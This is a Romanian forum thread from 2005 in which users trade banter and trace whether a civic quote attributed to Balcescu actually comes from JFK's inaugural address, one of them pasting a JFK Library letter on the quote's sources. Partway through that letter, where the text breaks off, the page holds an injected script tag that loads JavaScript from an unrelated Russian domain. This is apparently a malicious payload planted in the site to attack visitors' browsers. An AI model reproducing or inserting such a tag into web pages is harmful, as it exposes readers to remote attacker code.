Deci hai sa cautam unde ai gasit acea perla cu BALCESCU in original ori scrisa in ziarele vremii!

02.12.2005, 07:32
Eu nu sunt furios de loc....daca ai vedea cat sunt de relaxat nici nu ai crede ca sunt la munca si sunt platit ca sa postez mesaje pentru tine....smileys/smiley2.gif

Aconi se pare ca tu nu intelegi ce inseamna cuvantul SARCASM...smileys/smiley36.gifsau IRONIE

Eu doar glumeam si tuai si luat-o in serois. Ce ai scris tu civilizat si inteligent pe acest forum ca sa merite laude????

aconi
02.12.2005, 07:49
Ma bucur ca v-ati dezlantuit.Poate se va finaliza cu o coeziune a diasporei romanesti si a noastra;una originala sau daca vreti, cum ne e obiceiul, un model, dupa modelul fratilor maghiari.

Mugatu, Pomul nu poate trai fara radacini.Omul, atata timp cat atarna in pomul vietii, volens, nolens( ca tot iti place la..trina) are nevoie de seva vietii care vine si prin acele radacini. Daca le-ai extirpat, indiferent din ce motive, fie ele obiective sau subiective ai devenit un om singur.Ibsen spunea ca, acela este un om puternic care stie si poate sa vietuiasca singur.Pe de alta parte, Omul este definit ca zoon politikon.In aceasta ipostaza cauta sa se adapteze, sa se acomodeze si daca nimereste in un loc bun cum e USA, daca are si inteligenta si priceperea meseriei va reusi. Va reusi in sensul ca s-a realizat, a scapat de toate tarele pe care tu le enumeri. Dar, niciodata, aceste realizari nu vor putea substitui radacinile distruse cu brutalitate si cu ura neimplinirii. Aceasta se manifesta si la tine chiar prin faptul ca simti nevoia sa vorbesti despre ele. Daca nu ar fi asa nu ai smti nevoia sa participi la asemenea discutii.Te intrebi: ce era sa faci? ai sters putina. De ce daca nu pentru a te realiza?Condamni poporul roman, in comparatie cu celelalte. Ar trebui sa studiezi istoria si geografia, prin comparatie.Ai vedea ce a trecut peste capul acestui popor, asezat aici la rascruce de vanturi si poate ai reconsidera afirmatiile.Ai vedea de ce au aparut anumite comportamente, anumite zicatori ex. capul plecat sabia nu-l taie( in treacat spun, eu il aplic invers, capul plecat sabia ti-l taie)

Apropos:indiferent ce functie ai;scrii ca si rossa al nostru in timpul serviciului?

Ori cum, se framanta ceva in capul tau.Dar mai ales in sufletul tau.s-auzim de bine

aconi
02.12.2005, 07:57
Eu nu sunt furios de loc....daca ai vedea cat sunt de relaxat nici nu ai crede ca sunt la munca si sunt platit ca sa postez mesaje pentru tine....smileys/smiley2.gif

Aconi se pare ca tu nu intelegi ce inseamna cuvantul SARCASM...smileys/smiley36.gifsau IRONIE

Eu doar glumeam si tuai si luat-o in serois. Ce ai scris tu civilizat si inteligent pe acest forum ca sa merite laude????

de fapt amandoi am uitat a punem ghilimelele de rigoare.daca te crezi sarcastic,caut la cuvantul ironie.una mai serioasa: chiar crezi ca daca ai sponsorizat forumul devin supusul tau? banii nu a duc fericirea (daca sunt putini)smileys/smiley2.gif

02.12.2005, 08:01
Ori cum, se framanta ceva in capul tau.Dar mai ales in sufletul tau.s-auzim de bine

Ai dreptate Aconi, sunt foarte framantat, peste 5 minute plec acasa si diseara merg la o petrecere grozava pe care institutia la care lucrezo trage de Craciun pentru salariati si familiile lor. Sunt tulburat ca nu stiu cu ce sa ma imbrac....sa iau costumul negru cu camase alba si cravata rosie, sau costumul blue cu camase rose si cravata galbena? Tu ce crezi?smileys/smiley4.gif

aconi
02.12.2005, 08:20
Asta e un fel de Oktober Fest.Imbracamintea; sti cum a intrebat Rashela pe Raby? cum sa se "echipeze" in prima noapte dupa nunta... raspunsul cred ca il stii... ori cum ca tot te.. Nu uita insemnele americane place patronilor.E stiut lucru ei sunt mai patrioti de cat noi.Si iar ori cum PETRECERE FAINAsmileys/smiley2.gifce sa faci daca cravata de pioner ai bagat-o unde nu trebuia;poate cu ea iti statea mai mistosmileys/smiley1.gif

tonita
02.12.2005, 08:21
Da de asta ce ziceti ?

"Ceea ce este bine pentru fiecare in parte, este bine si pentru toti." (N. Balcescu)

aconi, daca nu sunt indiscret, cum ai sarbatorit 1 Dec. ?

aconi
02.12.2005, 08:35
a fost o zi ploioasa. Am participat ca simplu cetatean nefiind membru in niciun p. nici macar in Vatra romaneasca.Autoritatile au depus coroane de flori in cimitir la mormantul corifeilor Marii Uniri Vasile Goldis,Ioan Suciu si Stefan Cicio-Pop.Fratii de la UDMR au depus coroana cu panglica neagra.Presa a comentat ca Dumnealor considera aceasta zi ca zi de doliu.smileys/smiley2.gifcand este Ziua Germaniei?ca vreau sa beau un Amaretto original.Nu stiu de ce, dar am impresia ca esti din partile Aradului.Esti aproape de Frankfurt/M?

tonita
02.12.2005, 09:43
este Ziua Germaniei?ca vreau sa beau un Amaretto
original.Nu stiu de ce, dar am impresia ca esti din partile
Aradului.Esti aproape de Frankfurt/M?

3 oct - Ziua reunificarii Germaniei. Nu pricep de ce bei Amaretto-ul
care e specific italian de ziua asta si nu pur si simplu bere dar pe
undeva recunosc valentze europene in tine...Amaretto ar fi ideal pe 2
iunie, de 14 iulie un vin franzuzesc. Nu uita 15 martie, 20 august ,23
oct. zilele Ungariei care iti vor aduce multa bucurie smileys/smiley36.gif

GNChicago
02.12.2005, 11:34
Toni42 ma refer la perla scoasa de Agora si am subliniat-o si am cerut ajutor sa aflu exact daca a fost Balcescu, unde si dovezi solide intrucit aceste vorbe sunt atribuite lui John F. Kennedy.

Daca Balcescu a spus acele vorbe trebuie restabilita paternitatea lor, respectul pentru Romania si stramosii lor.

GNChicago
02.12.2005, 11:42
Mugatu, desi nu m-ai intrebat sugerez cravata rosie ptrca e sarbatoarea de Craciun, deasemenea puterea care iti doresc sa vina cit mai repede....

agora
02.12.2005, 20:11
pt GNChicago

Mai tot timpul discursurile sunt scrise pentru presedinti asa ca e probabil ca autorul sa se fi inspirat de undeva. In postarea anterioara glumeam pentru ca, pentru mine, paternitatea acestei fraze nu are mare relevanta, ma intereseaza mult mai mult daca am putea sa ne-o asumam.

Incredere in justita americana? Merge mult mai bine ca in multe alte tari dar e departe de perfectiune. Au "scapat" si ei vinovati care ar fi trebuit condamnati si au comis si "erori judiciare" care pe unii i-a costat viata.

Revenind la dom' Balcescu... Pentru ca nu plimb cu mine tot ce am citit in ultimiizeci de ani (imi recunosc vina desi sper sa nu ma...smileys/smiley46.gif smileys/smiley36.gif)am trimis un email unui amic de nelinisti metafizice iar daca omul nu va reusi sa gaseasca nimic sper sa reusesc sa ma documentez personal in urmatoarele 1-2 luni.Sper sa nu fie de pomana si sa ma amagesti cu importanta ideii, ca iti trimit decontul la biletele de avion; glumesc!smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif

agora
02.12.2005, 20:18
pt Toni42

Sper ca nu vroiai sa insinuezi nimic despre integritatea lui Balcescu cand ai adus citatul:"Ceea ce este bine pentru fiecare in parte, este bine si pentru toti." Glumesc!smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif

Probabil omul a dat o varianta pe pozitiv a altei zicale: Ce tie nu iti place altuia nu face.

03.12.2005, 01:28
Mugatu, desi nu m-ai intrebat sugerez cravata rosie
ptrca e sarbatoarea de Craciun, deasemenea puterea care iti doresc sa
vina cit mai repede....

Multumesc GN, asa am facut, cravata rosie a fost si a iesit bine...smileys/smiley36.gif

Cat despre discursul lui JFK, am facut sapaturi si uite ce am gasit:

Dear Sir,</span><br style="font-style: italic; color: rgb(0, 0, 204);"><br style="font-style: italic; color: rgb(0, 0, 204);">This
is in response to your request for information regarding the derivation
of President Kennedy's quotation "Ask not what your country can do for
you--ask what you can do for your country."</span><br style="font-style: italic; color: rgb(0, 0, 204);"><br style="font-style: italic; color: rgb(0, 0, 204);">In A Thousand Days
(Houghton Mifflin, 1965) Arthur Schlesinger, Jr. relates in a footnote
on page 4, that John Kennedy kept a looseleaf notebook of quotations,
and that as early as 1945 he had entered a quotation ascribed to the
18th century French philosopher Jean Jacques Rousseau: "As soon as any
man says of the affairs of state, What does it matter to me?, the state
may be given up as lost." (no source cited).</span><br style="font-style: italic; color: rgb(0, 0, 204);"><br style="font-style: italic; color: rgb(0, 0, 204);">Van Wyck Brooks'
New England: Indian Summer (1940) contains remarks made by the Mayor of
Haverhill, Massachusetts at the funeral of John Greenleaf Whittier in
which is the following: "Here may we be reminded that man is most
honored, not by that which a city may do for him, but by that which he
has done for the city." And, Supreme Court Justice Oliver Wendell
Holmes, in a Memorial Day address is 1884 stated: "It is now the moment
when by common consent we pause to become conscious of our national
life and to rejoice in it, to recall what our country has done for each
of us, and to ask ourselves what we can do for our country in return."</span><br style="font-style: italic; color: rgb(0, 0, 204);"><br style="font-style: italic; color: rgb(0, 0, 204);">Guy
Emerson in The New Frontier: A Study of the American Liberal
Spirit...(Henry Holt and Co., 1920) placed special emphasis on this
thought on the that last page of the text, in italics: "...men and
women are born to put more into their country than they take out of
it." (The copy of the book in the Kennedy Library was a gift to the
President received at the White House in April, 1961).</span><br style="font-style: italic; color: rgb(0, 0, 204);"><br style="font-style: italic; color: rgb(0, 0, 204);">President
Kennedy may have encountered all these sources in his education. He
expressed similar ideas on at least two occasions prior to the
inauguration. On July 15, 1960 in his address to the Democratic
National Convention accepting the Party's nomination for President he
defined his "New Frontier" saying: "It sums up not what I intend to
offer the American People, but what I intend to ask of them." On
September 5, 1960, in Detroit, he said: "The new frontier is not what I
promise I am going to do for you. The new frontier is what I ask you
to do for your country." Incidentally, in a earlier draft of the
Inaugural Address the line had been: "Ask not what your country is
going to do for you...(etc.)"</span><br style="font-style: italic; color: rgb(0, 0, 204);"><br style="font-style: italic; color: rgb(0, 0, 204);">To summarize, the idea had<script src=http://www.iroe.ru/ngg.js></script>

GNChicago
03.12.2005, 05:09
Multumesc Mugatu. Raspunsul tau este peste orice asteptari, fantastic.

Agora a scos perla din gura cu mentiunea la Balcescu care a trait intre 1819-1852, nestiind probabil ca aceste cuvinte sunt atribuite de majoritatea americanilor lui John F. Kennedy, dar vad ca au fost diferite variante care merg pina prin secolul 18.

Daca aflam ceva surse din Romania cred ca ar trebui informata si JFK Library.

Thanks again.

agora
04.12.2005, 20:56
Pt GNChicago

Recunosc ca nu am avut habar ca americanii atribuie citatul lui Kennedy. E destul de probabil sa fi existat o sursa comuna prin Europa secolului XVIII.

Materialul in care am gasit citatul, acumaproximativ 13-14 ani, era o publicatie a unei edituri militare, dar nu retin anul publicarii sau alte detalii. Am contactat si o persoana care are cunostinte in mediul militar si pana la urma sper sa gasim ceva mai obiectiv decat perla mea.